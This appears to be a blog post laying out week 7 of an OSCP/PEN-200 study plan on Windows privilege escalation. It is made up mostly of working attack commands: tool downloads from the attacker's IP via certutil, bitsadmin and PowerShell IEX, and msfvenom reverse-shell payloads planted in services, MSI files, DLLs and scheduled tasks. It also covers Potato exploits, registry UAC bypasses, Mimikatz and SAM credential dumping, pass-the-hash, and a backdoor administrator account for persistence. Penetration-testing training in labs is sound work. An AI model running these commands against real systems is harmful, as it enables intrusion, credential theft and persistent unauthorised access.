Windows Privilege Escalation & Rooting Windows Machines
WEEK 7 Windows Privilege Escalation & Rooting Windows Machines
Windows Privilege Escalation & Rooting Windows Machines
Week 7: Windows Privilege Escalation & Rooting Windows Machines
OSCP / PEN-200 Study Plan — Complete Detail Guide
PEN-200 Pages 471 to 527
Overview
Week 7 is dedicated entirely to Windows. After the introductory and intermediate coverage in Weeks 5 and 6, this week consolidates every Windows privilege escalation technique into a single comprehensive reference and applies them in a structured lab workflow that mirrors the OSCP exam approach. The week culminates in a live demonstration of fully rooting a Windows machine from initial foothold to SYSTEM — covering the complete post-exploitation chain.
Core Theme: Privilege escalation on Windows is a checklist problem. The attacker who wins is the one with the most complete, most methodical checklist — not necessarily the most creative one. This week builds that checklist and the muscle memory to execute it under exam pressure.
Learning Objectives
By the end of Week 7, you should be able to:
- Execute a complete Windows privilege escalation enumeration sequence in under ten minutes
- Interpret WinPEAS and PowerUp.ps1 output and map findings to specific exploitation techniques
- Exploit every common Windows privesc vector without referring to notes
- Understand and abuse Windows access control mechanisms at a technical level
- Transfer tools to a Windows target using multiple methods when the obvious ones are blocked
- Escalate from any standard user or service account to SYSTEM on a Windows lab machine
- Document a complete root chain suitable for an OSCP exam report
Windows Privilege Escalation — Full Methodology
The methodology below is ordered by speed and reliability. Always start with quick wins before moving to slower or more complex techniques.
1
2
3
4
5
Phase 1 — Situational Awareness (2-3 minutes)
Phase 2 — Automated Enumeration (3-5 minutes)
Phase 3 — Manual Deep Enumeration (10-20 minutes)
Phase 4 — Exploitation (variable)
Phase 5 — Verification and Cleanup (2-3 minutes)
Phase 1 — Situational Awareness
Run this full sequence immediately after obtaining a shell. Do not skip steps — each command answers a specific question that shapes your approach.
:: -----------------------------------------------
:: IDENTITY — who are you and what can you do
:: -----------------------------------------------
whoami
whoami /all
whoami /priv
whoami /groups
:: -----------------------------------------------
:: SYSTEM — what OS version and patch level
:: -----------------------------------------------
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix"
wmic qfe get Caption,Description,HotFixID,InstalledOn
:: -----------------------------------------------
:: USERS — who else is here
:: -----------------------------------------------
net user
net user <username>
net localgroup
net localgroup Administrators
net localgroup "Remote Desktop Users"
net localgroup "Remote Management Users"
query user
:: -----------------------------------------------
:: NETWORK — where can you go
:: -----------------------------------------------
ipconfig /all
netstat -ano
netstat -ano | findstr LISTENING
route print
arp -a
:: -----------------------------------------------
:: PROCESSES — what is running and as whom
:: -----------------------------------------------
tasklist
tasklist /SVC
tasklist /v
wmic process get Caption,CommandLine,ProcessId,ParentProcessId
:: -----------------------------------------------
:: SERVICES — what services exist and how are they configured
:: -----------------------------------------------
sc query
sc query type= all state= all
wmic service get Name,StartName,PathName,StartMode,State
wmic service get Name,StartName,PathName,StartMode | findstr /i "auto"
:: -----------------------------------------------
:: SCHEDULED TASKS — what runs automatically and as whom
:: -----------------------------------------------
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /B /C:"Task Name" /C:"Run As User" /C:"Task To Run" /C:"Status"
:: -----------------------------------------------
:: INSTALLED SOFTWARE — what applications are present
:: -----------------------------------------------
wmic product get Name,Version,InstallDate
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr DisplayName
reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr DisplayName
dir "C:\Program Files"
dir "C:\Program Files (x86)"
:: -----------------------------------------------
:: DRIVES AND SHARES — what storage is accessible
:: -----------------------------------------------
wmic logicaldisk get Caption,Description,FileSystem,FreeSpace,Size
net share
net use
:: -----------------------------------------------
:: ENVIRONMENT — variables that reveal paths and configs
:: -----------------------------------------------
set
echo %PATH%
echo %TEMP%
echo %APPDATA%
:: -----------------------------------------------
:: FIREWALL — what traffic is blocked
:: -----------------------------------------------
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all
:: -----------------------------------------------
:: ANTIVIRUS — what is protecting the machine
:: -----------------------------------------------
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName,productState
sc query windefend
tasklist | findstr -i "defender avast avira malware eset norton"
Phase 2 — Automated Enumeration
WinPEAS — Comprehensive Automated Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
:: Transfer WinPEAS to target — multiple methods
:: Method 1: PowerShell download (most reliable)
(New-Object Net.WebClient).DownloadFile('http://<your_ip>/winPEASx64.exe','C:\Temp\wp.exe')
:: Method 2: certutil (built-in, works on older systems)
certutil -urlcache -split -f http://<your_ip>/winPEASx64.exe C:\Temp\wp.exe
:: Method 3: SMB share from Kali
:: On Kali: impacket-smbserver share . -smb2support
copy \\<your_ip>\share\winPEASx64.exe C:\Temp\wp.exe
:: Method 4: bitsadmin (older Windows)
bitsadmin /transfer job http://<your_ip>/winPEASx64.exe C:\Temp\wp.exe
:: Run WinPEAS
C:\Temp\wp.exe
:: Run with specific checks only (faster)
C:\Temp\wp.exe systeminfo userinfo
C:\Temp\wp.exe servicesinfo procesinfo
:: Save output
C:\Temp\wp.exe > C:\Temp\wp_output.txt 2>&1
type C:\Temp\wp_output.txt
:: Run quiet (no colors — easier to read in some shells)
C:\Temp\wp.exe quiet
WinPEAS output — what to action first:
| Color in WinPEAS | Meaning | Action |
|---|---|---|
| Red / highlighted | High confidence finding | Exploit immediately |
| Yellow | Potential finding | Investigate manually |
| Green | Low risk / informational | Note for later |
Priority findings to look for:
1
2
3
4
5
6
7
8
9
10
11
12
13
- SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege — Potato exploits
- Unquoted service paths with writable intermediate directories
- Services with weak DACL (Everyone / Users can modify)
- AlwaysInstallElevated = 1 in both HKLM and HKCU
- AutoRuns pointing to writable binaries
- Stored credentials in files or registry
- Modifiable service binary paths
- Scheduled tasks running as SYSTEM with writable scripts
- DLL hijacking opportunities in PATH
- Writable directories in system PATH
- SAM/SYSTEM hive access
- Plaintext passwords in configuration files
- PowerShell history with credentials
PowerUp.ps1 — Service and Configuration Focus
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
:: Transfer PowerUp
(New-Object Net.WebClient).DownloadFile('http://<your_ip>/PowerUp.ps1','C:\Temp\pu.ps1')
:: Import and run all checks
powershell -ep bypass
Import-Module C:\Temp\pu.ps1
Invoke-AllChecks
:: Run individual checks
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService
Get-ServiceDetail -Name <name>
Find-PathDLLHijack
Get-RegistryAlwaysInstallElevated
Get-ModifiableRegistryAutoRun
Get-CachedGPPPassword
Get-UnattendedInstallFile
Get-WebConfig
Invoke-AllChecks | Out-File C:\Temp\powerup_results.txt
:: One-liner without importing module
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<your_ip>/PowerUp.ps1'); Invoke-AllChecks"
Phase 3 — Manual Deep Enumeration
Automated tools miss context. Run these manual checks after automated enumeration to fill in gaps.
Service Enumeration (Manual)
:: List all services with their binary paths — look for unquoted paths with spaces
wmic service get Name,PathName,StartMode,StartName | findstr /i /v "C:\\Windows\\"
:: Check specific service configuration in detail
sc qc <service_name>
sc query <service_name>
:: Check service DACL — who can configure this service
sc sdshow <service_name>
:: Use accesschk to check service permissions by user group
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -uwcqv "<your_username>" *
:: Check permissions on service binary
icacls "C:\path\to\service\binary.exe"
accesschk.exe /accepteula -quvw "C:\path\to\service\binary.exe"
Registry Enumeration (Manual)
:: AlwaysInstallElevated — both must be 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
:: AutoRun entries — check if binaries are writable
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
:: Stored credentials in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
:: GPP cached passwords (Group Policy Preferences)
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PolicyDescriptions
File System Enumeration (Manual)
:: Find files with "password" in the name or content
dir /s /b *password* 2>nul
dir /s /b *credential* 2>nul
dir /s /b *secret* 2>nul
dir /s /b *.config 2>nul
dir /s /b *.ini 2>nul
dir /s /b *.xml 2>nul
:: Search inside files for password strings
findstr /si "password" C:\*.txt C:\*.xml C:\*.ini C:\*.config
findstr /si "pwd" C:\*.txt C:\*.xml C:\*.ini
:: Unattended install files — contain base64 admin passwords
dir /s /b C:\Windows\Panther\Unattend*.xml
dir /s /b C:\sysprep.xml C:\sysprep.inf
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\system32\sysprep\sysprep.xml
:: IIS web configuration
type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
:: PowerShell command history
type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
dir /s /b ConsoleHost_history.txt
:: WinSCP and PuTTY saved sessions (may contain credentials)
reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s
reg query HKCU\Software\Martin Prikryl\WinSCP 2\Sessions /s
:: Check if SAM is accessible
icacls C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SYSTEM
icacls C:\Windows\System32\config\SECURITY
:: Writable directories in PATH
for %d in (%PATH%) do (icacls "%d" 2>nul | findstr /i "(W)" && echo WRITABLE: %d)
Token Privilege Enumeration
whoami /priv
:: Privileges that lead directly to SYSTEM:
:: SeImpersonatePrivilege — Potato exploits
:: SeAssignPrimaryTokenPrivilege — Potato exploits
:: SeBackupPrivilege — Read any file (SAM, SYSTEM)
:: SeRestorePrivilege — Write any file
:: SeTakeOwnershipPrivilege — Own any object
:: SeDebugPrivilege — Access any process memory
:: SeLoadDriverPrivilege — Load a malicious driver
:: SeManageVolumePrivilege — Write to volume directly
Phase 4 — Exploitation (All Vectors)
Vector 1 — SeImpersonatePrivilege (Potato Exploits)
:: Confirm privilege
whoami /priv | findstr /i "impersonate"
:: PrintSpoofer — Windows 10, Server 2016/2019 (most reliable)
PrintSpoofer64.exe -i -c powershell
PrintSpoofer64.exe -c "C:\Temp\shell.exe"
PrintSpoofer64.exe -i -c "cmd /c whoami"
:: GodPotato — broadest Windows version support
GodPotato-NET4.exe -cmd "C:\Temp\shell.exe"
GodPotato-NET4.exe -cmd "cmd /c net user hacker Password123! /add && net localgroup Administrators hacker /add"
:: JuicyPotato — Server 2008-2016
:: Find CLSID for target OS at github.com/ohpe/juicy-potato/tree/master/CLSID
JuicyPotato.exe -l 9999 -p C:\Temp\shell.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
:: SweetPotato — combined variant
SweetPotato.exe -p C:\Temp\shell.exe
:: RoguePotato — Server 2019 when JuicyPotato fails
:: Requires a port redirect from target to attacker
RoguePotato.exe -r <your_ip> -e "C:\Temp\shell.exe" -l 9999
Vector 2 — Unquoted Service Paths
:: Find unquoted service paths
wmic service get Name,PathName,StartMode | findstr /i "auto" | findstr /i /v "C:\\Windows\\" | findstr /i /v """"
:: Manually verify (confirm no quotes and space in path)
sc qc VulnerableService
:: PathName should appear as: C:\Program Files\My App\Service\app.exe (no quotes)
:: Determine which path segment is writable
icacls "C:\Program Files\My App"
icacls "C:\Program Files"
icacls "C:\"
:: Generate malicious binary with the correct intermediate name
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe -o App.exe
:: Transfer to writable path
copy App.exe "C:\Program Files\My.exe"
:: Start listener and restart service
nc -lvnp 4444
sc stop VulnerableService
sc start VulnerableService
:: If you cannot restart the service, check if it restarts on reboot
:: and schedule a reboot if permitted
Vector 3 — Weak Service Permissions
:: Find services where current user can change configuration
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "<username>" *
:: Confirm the service can be reconfigured
accesschk.exe /accepteula -ucqv VulnerableService
:: Generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe -o shell.exe
:: Transfer shell.exe to target (C:\Temp\shell.exe)
:: Change the service binary path to your payload
sc config VulnerableService binpath= "C:\Temp\shell.exe"
sc config VulnerableService binpath= "cmd /c C:\Temp\shell.exe"
:: Start listener and restart service
nc -lvnp 4444
sc stop VulnerableService
sc start VulnerableService
:: PowerUp automated exploitation
Invoke-ServiceAbuse -Name VulnerableService -Command "net localgroup Administrators <user> /add"
Vector 4 — Modifiable Service Binary
:: The service binary itself is writable — replace it directly
:: Check write permissions on the binary
accesschk.exe /accepteula -quvw "C:\Program Files\VulnerableApp\service.exe"
icacls "C:\Program Files\VulnerableApp\service.exe"
:: Backup original (in case you need to restore)
copy "C:\Program Files\VulnerableApp\service.exe" C:\Temp\service_backup.exe
:: Replace with payload
copy C:\Temp\shell.exe "C:\Program Files\VulnerableApp\service.exe"
:: Restart service to trigger execution
nc -lvnp 4444
sc stop VulnerableService
sc start VulnerableService
Vector 5 — AlwaysInstallElevated
:: Confirm both keys are set to 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
:: Generate MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f msi -o shell.msi
:: Transfer MSI to target
:: Start listener and install MSI — runs as SYSTEM
nc -lvnp 4444
msiexec /quiet /qn /i C:\Temp\shell.msi
:: Alternatively add an admin user via MSI
msfvenom -p windows/exec CMD='net localgroup Administrators <user> /add' -f msi -o adduser.msi
msiexec /quiet /qn /i C:\Temp\adduser.msi
Vector 6 — Scheduled Task Abuse
:: Find tasks running as SYSTEM with writable scripts or binaries
schtasks /query /fo LIST /v | findstr /B /C:"Task Name" /C:"Run As User" /C:"Task To Run"
:: Check permissions on the task's target file
icacls "C:\path\to\task\script.bat"
icacls "C:\path\to\task\binary.exe"
:: If the script is writable — append reverse shell
echo C:\Temp\shell.exe >> C:\path\to\task\script.bat
:: If the binary is writable — replace it
copy C:\Temp\shell.exe "C:\path\to\task\binary.exe"
:: Force the task to run if permissions allow
nc -lvnp 4444
schtasks /run /tn "TaskName"
:: Create a new scheduled task if you have sufficient privileges
schtasks /create /sc onlogon /tn "Updater" /tr "C:\Temp\shell.exe" /ru SYSTEM
Vector 7 — DLL Hijacking
:: Services and applications running as SYSTEM load DLLs
:: If a missing DLL is searched in a writable directory — plant it there
:: Use Process Monitor on a test machine to find missing DLLs
:: Filter: Result = NAME NOT FOUND + Path ends with .dll + Process = target.exe
:: Generate a malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f dll -o missing.dll
:: Place the DLL in the writable search path
copy missing.dll "C:\writable\path\MissingLibrary.dll"
:: Restart the service or trigger the application
nc -lvnp 4444
sc stop TargetService && sc start TargetService
Vector 8 — Token Impersonation via SeDebugPrivilege
:: SeDebugPrivilege allows reading memory of any process — including SYSTEM processes
:: Usable to migrate into a SYSTEM process via Meterpreter or manual injection
:: In Meterpreter
getprivs
migrate <SYSTEM_process_PID>
getuid # should now show NT AUTHORITY\SYSTEM
:: Processes that commonly run as SYSTEM and are stable to migrate into:
tasklist | findstr -i "winlogon lsass services"
:: winlogon.exe and services.exe are reliable targets
Vector 9 — UAC Bypass Techniques
:: Identify UAC level
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
:: 5 = default (prompt for consent) — bypassable
:: 2 = prompt for credentials — harder to bypass
:: 0 = no UAC — no bypass needed
:: Method 1: fodhelper.exe (Windows 10, 11)
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Temp\shell.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f
start fodhelper.exe
:: Clean up after exploitation
reg delete HKCU\Software\Classes\ms-settings /f
:: Method 2: eventvwr.exe (Windows 7-10)
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "C:\Temp\shell.exe" /f
start eventvwr.exe
reg delete HKCU\Software\Classes\mscfile /f
:: Method 3: sdclt.exe (Windows 10)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /d "C:\Temp\shell.exe" /f
start sdclt.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
Vector 10 — Credential Extraction and Reuse
:: SAM database — extract local password hashes
:: Requires SYSTEM access (or SeBackupPrivilege)
reg save HKLM\SAM C:\Temp\sam
reg save HKLM\SYSTEM C:\Temp\system
reg save HKLM\SECURITY C:\Temp\security
:: Transfer to Kali and extract
impacket-secretsdump -sam sam -system system -security security LOCAL
:: Mimikatz — dump credentials from LSASS memory
:: Requires SYSTEM or SeDebugPrivilege
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # dump plaintext passwords if WDigest is on
sekurlsa::wdigest # dump WDigest credentials
lsadump::sam # dump SAM hashes
lsadump::secrets # dump LSA secrets
lsadump::dcsync /user:Administrator # DCSync (domain environments)
:: Enable WDigest (forces plaintext password caching — requires logoff/logon)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
:: Pass-the-Hash with extracted NTLM hash
impacket-psexec administrator@<target_ip> -hashes :<ntlm_hash>
crackmapexec smb <target_ip> -u administrator -H <ntlm_hash>
:: Credential Manager dump
cmdkey /list
:: Use stored credentials for lateral movement
runas /savecred /user:administrator "C:\Temp\shell.exe"
Vector 11 — AutoRun Binary Replacement
:: Check AutoRun entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
:: Check if the binary is writable
icacls "C:\path\to\autorun\binary.exe"
:: Replace with payload
copy C:\Temp\shell.exe "C:\path\to\autorun\binary.exe"
:: Wait for an administrator to log in (the shell fires as them)
:: Or force a logon event if you have access to the console
Vector 12 — Stored GPP Passwords
Group Policy Preferences used to store encrypted passwords in SYSVOL. The encryption key was publicly disclosed — these are trivially decryptable.
1
2
3
4
5
6
7
8
9
:: Search for GPP XML files
findstr /si "cpassword" C:\Windows\SYSVOL\*.xml
findstr /si "cpassword" C:\ProgramData\Microsoft\Group Policy\*.xml
:: Decrypt the cpassword value on Kali
gpp-decrypt <cpassword_value>
:: PowerUp check
Get-CachedGPPPassword
Phase 5 — Verification and Post-Exploitation
After escalating to SYSTEM or Administrator:
:: Verify your new identity
whoami
whoami /priv
whoami /all
:: Dump all local user hashes
:: Using Mimikatz
.\mimikatz.exe "privilege::debug" "lsadump::sam" exit
:: Using impacket from Kali (remote)
impacket-secretsdump <user>:<password>@<target_ip>
impacket-secretsdump administrator@<target_ip> -hashes :<ntlm_hash>
:: Locate proof.txt (OSCP exam flag)
type C:\Users\Administrator\Desktop\proof.txt
type C:\Documents and Settings\Administrator\Desktop\proof.txt
dir /s /b proof.txt
:: Take a screenshot showing SYSTEM shell with hostname and whoami
:: hostname confirms which machine you are on
hostname
whoami
ipconfig
:: If you need persistence (non-exam scenarios)
net user backdoor Password123! /add
net localgroup Administrators backdoor /add
Tool Transfer Methods — Reference
When the obvious transfer methods are blocked, work through this list.
:: PowerShell WebClient (most common)
(New-Object Net.WebClient).DownloadFile('http://<ip>/tool.exe','C:\Temp\tool.exe')
Invoke-WebRequest -Uri 'http://<ip>/tool.exe' -OutFile 'C:\Temp\tool.exe'
:: certutil (built-in, older systems)
certutil -urlcache -split -f http://<ip>/tool.exe C:\Temp\tool.exe
:: bitsadmin (older Windows, background transfer)
bitsadmin /transfer job /download /priority high http://<ip>/tool.exe C:\Temp\tool.exe
:: SMB (impacket-smbserver on Kali, copy on target)
:: Kali: impacket-smbserver share . -smb2support -username user -password pass
net use \\<kali_ip>\share /user:user pass
copy \\<kali_ip>\share\tool.exe C:\Temp\tool.exe
:: FTP (set up on Kali with python pyftpdlib)
:: Kali: python3 -m pyftpdlib -p 21 -w
ftp -s:ftp_commands.txt <kali_ip>
:: ftp_commands.txt: open <ip>, user anonymous, get tool.exe, quit
:: curl (available in Windows 10/11 and Server 2019+)
curl http://<ip>/tool.exe -o C:\Temp\tool.exe
:: wget (via PowerShell alias)
wget http://<ip>/tool.exe -OutFile C:\Temp\tool.exe
:: Base64 paste (when no network methods work — paste directly into shell)
:: Kali: base64 -w0 tool.exe
:: Target:
$b64 = "<paste base64 string>"
[System.IO.File]::WriteAllBytes("C:\Temp\tool.exe", [System.Convert]::FromBase64String($b64))
Windows Privilege Escalation Decision Tree
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Start: Low-privilege shell obtained
|
+-- whoami /priv
| |
| +-- SeImpersonatePrivilege present?
| YES --> PrintSpoofer / GodPotato --> SYSTEM
| NO --> continue
|
+-- Run WinPEAS + PowerUp
| |
| +-- Unquoted service path found?
| | YES --> plant binary in writable path --> restart service
| |
| +-- Weak service DACL found?
| | YES --> sc config binpath --> restart service
| |
| +-- AlwaysInstallElevated = 1?
| | YES --> msfvenom MSI --> msiexec /i
| |
| +-- Writable AutoRun binary?
| | YES --> replace binary --> wait for admin login
| |
| +-- Scheduled task with writable script?
| YES --> append to script --> trigger or wait
|
+-- Manual credential search
| |
| +-- Unattend.xml / web.config / history files?
| | YES --> extract and decrypt credentials --> reuse
| |
| +-- cmdkey stored credentials?
| YES --> runas /savecred
|
+-- UAC bypass (if local admin but not elevated)
| YES --> fodhelper / eventvwr registry technique
|
+-- DLL hijacking (PATH writable or service loads missing DLL)
| YES --> plant malicious DLL --> restart service
|
+-- GPP cpassword in SYSVOL
YES --> gpp-decrypt --> use credentials
Practice Resources
OffSec PEN-200 Labs (Pages 471-527)
| Module | Focus Area |
|---|---|
| Windows Privileges and Access Control | Token model, privilege deep dive |
| Automated Enumeration with WinPEAS | Full scan interpretation |
| Unquoted Service Paths | Identification and exploitation |
| Weak Service Permissions | DACL analysis and abuse |
| AlwaysInstallElevated | MSI payload delivery |
| Scheduled Task Abuse | Script replacement technique |
| Token Impersonation | Potato exploit variants |
| Credential Extraction | Mimikatz, SAM dumping |
| UAC Bypass | Registry-based techniques |
Proving Ground Practice Labs
| Machine | Difficulty | Primary Technique |
|---|---|---|
Kevin | Easy | Weak service permissions |
Algernon | Easy | AlwaysInstallElevated |
Internal | Easy | Stored credentials + reuse |
Nickel | Medium | SeImpersonatePrivilege + Potato |
Billyboss | Medium | DLL hijacking or service abuse |
Escape | Medium | UAC bypass + credential extraction |
Heist | Medium | Credential mining + lateral movement |
Hutch | Medium | GPP password + service escalation |
For every machine: complete manual situational awareness before running any automated tool. Document your full command sequence and the exact output that led you to the vulnerability.
Additional References
| Resource | Purpose |
|---|---|
| lolbas-project.github.io | Living-off-the-land binaries for file transfer and execution |
| github.com/carlospolop/PEASS-ng | WinPEAS releases |
| github.com/PowerShellMafia/PowerSploit | PowerUp source |
| github.com/ohpe/juicy-potato | JuicyPotato + CLSID list |
| github.com/itm4n/PrintSpoofer | PrintSpoofer releases |
| github.com/BeichenDream/GodPotato | GodPotato releases |
| github.com/gentilkiwi/mimikatz | Mimikatz releases |
Suggested Daily Schedule (7-Day Breakdown)
| Day | Focus | Hours |
|---|---|---|
| Day 1 | Full situational awareness drill — practice the command sequence from memory on a lab target | 3-4 hrs |
| Day 2 | WinPEAS and PowerUp deep dive — interpret real output and map to techniques | 4-5 hrs |
| Day 3 | Service-based escalation — unquoted paths, weak DACL, modifiable binary | 4-5 hrs |
| Day 4 | Token impersonation, UAC bypass, AlwaysInstallElevated, scheduled tasks | 4-5 hrs |
| Day 5 | Credential extraction — Mimikatz, SAM dumping, password file hunting | 3-4 hrs |
| Day 6 | Proving Ground labs — at least three machines from the list above | 5-6 hrs |
| Day 7 | Live demo prep — root a Windows machine end-to-end, document the chain | 4-5 hrs |
Week 7 Checklist
Situational Awareness
- Can execute the full awareness command sequence from memory in under five minutes
- Correctly interpreted WinPEAS output and identified the highest priority finding
- Correctly interpreted PowerUp output and identified at least two vectors
Token and Privilege Abuse
- Confirmed SeImpersonatePrivilege and escalated using PrintSpoofer
- Confirmed SeImpersonatePrivilege and escalated using GodPotato as a backup
- Exploited SeBackupPrivilege to extract SAM and SYSTEM hives
- Exploited SeDebugPrivilege to migrate into a SYSTEM process
Service-Based Escalation
- Found and exploited an unquoted service path
- Found and exploited a service with a weak DACL
- Found and replaced a writable service binary
- Planted a malicious DLL in a service’s search path
Registry and Policy-Based Escalation
- Confirmed AlwaysInstallElevated and exploited with MSI payload
- Found and replaced a writable AutoRun binary
- Performed a UAC bypass using the registry technique
- Found and decrypted a GPP cpassword
Credential-Based Escalation
- Dumped local hashes using Mimikatz lsadump::sam
- Found plaintext credentials in a configuration or unattended install file
- Used cmdkey stored credentials with runas /savecred
- Performed Pass-the-Hash using an extracted NTLM hash
Full Chain
- Rooted at least three Proving Ground Windows machines with full documentation
- Completed one end-to-end root demonstration from foothold to proof.txt
Key Takeaways
- The enumeration phase is not optional — every minute skipped on enumeration costs five minutes of blind exploitation attempts.
- SeImpersonatePrivilege is present on virtually every IIS and MSSQL service account — always check it first on Windows web or database servers.
- Unquoted service paths with writable intermediate directories are the most common OSCP Windows privesc vector — know the search order instinctively.
- Mimikatz and SAM dumping are the final steps after reaching SYSTEM — do not attempt them before escalating.
- UAC is not a security boundary — it is a convenience feature. A local administrator can almost always bypass it.
- Password reuse is the highest-yield credential technique in OSCP labs — every found password should be tested against every known service.
- Document every step during practice — your lab notes are your exam cheat sheet.
| _Plan prepared for OSCP / PEN-200 Week 7 | Comprehensive Windows Privilege Escalation → Credential Extraction → Full Machine Compromise_ |
You can find me online at:
This post is licensed under CC BY 4.0 by the author.